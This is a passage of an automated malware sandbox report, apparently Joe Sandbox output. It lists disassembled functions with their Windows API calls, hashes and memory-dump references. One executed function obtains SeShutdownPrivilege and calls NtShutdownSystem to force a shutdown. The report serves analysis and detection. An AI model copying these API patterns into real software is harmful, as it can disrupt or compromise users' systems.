                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                                                                                                      • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                      • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                                      • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                                                                                                      • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                                      • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405CE4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Version
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                                      • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                                      • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                                                                                                      • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                                      • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                                      • API String ID: 4190037839-2401316094
                                                                                                                                                                      • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                                      • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                                                      • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                                      • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1694776339-0
                                                                                                                                                                      • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                      • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                                                                      • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                      • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                                                                                                        • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                        • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                      • API String ID: 1044490935-665933166
                                                                                                                                                                      • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                                                                                      • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                                                                                                      • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                                                                                      • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                                                                      • LocalFree.KERNEL32(004CE588,00000000,00401AB4), ref: 00401A1B
                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,004CE588,00000000,00401AB4), ref: 00401A3A
                                                                                                                                                                      • LocalFree.KERNEL32(004CF588,?,00000000,00008000,004CE588,00000000,00401AB4), ref: 00401A79
                                                                                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3782394904-0
                                                                                                                                                                      • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                      • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                                                                                      • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                      • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitMessageProcess
                                                                                                                                                                      • String ID: Error$Runtime error at 00000000$9@
                                                                                                                                                                      • API String ID: 1220098344-1503883590
                                                                                                                                                                      • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                      • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                      • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 262959230-0
                                                                                                                                                                      • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                                                                                      • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                                                                                      • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                                                                                      • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                                                                                                      • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CommandHandleLineModule
                                                                                                                                                                      • String ID: @&K$U1hd.@
                                                                                                                                                                      • API String ID: 2123368496-3174862013
                                                                                                                                                                      • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                      • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                                                                      • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                      • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 730355536-0
                                                                                                                                                                      • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                                                                                      • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                                                      • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                                                                                      • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                      • String ID: )q@
                                                                                                                                                                      • API String ID: 3660427363-2284170586
                                                                                                                                                                      • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                                                                                      • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                                                                                      • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1458359878-0
                                                                                                                                                                      • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                                      • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 004023F2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 82librarynativeshutdownCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402404
                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00402488
                                                                                                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,?), ref: 004024B4
                                                                                                                                                                      • LoadLibraryA.KERNEL32(NTDLL.DLL), ref: 004024D2
                                                                                                                                                                      • NtShutdownSystem.NTDLL(00000001), ref: 004024F1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$AdjustLookupPrivilegePrivilegesShutdownSystemTokenValue
                                                                                                                                                                      • String ID: NTDLL.DLL$SeShutdownPrivilege$advapi32.dll
                                                                                                                                                                      • API String ID: 2117616786-2471717051
                                                                                                                                                                      • Opcode ID: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                      • Instruction ID: 3c0ce9a7761a6e63309c521fc4ca6a6d9466e377a545f21450368ef7aac56ae8
                                                                                                                                                                      • Opcode Fuzzy Hash: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                      • Instruction Fuzzy Hash: F13146B1E10209EBDB04DFE0CD46BEEBB74EB44701F20416AF501B66C0E7795A44CBA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409543 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78memorylibrarynativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(00000180,005C0000), ref: 00409626
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(00000178,005C0000), ref: 0040963C
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                      • LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
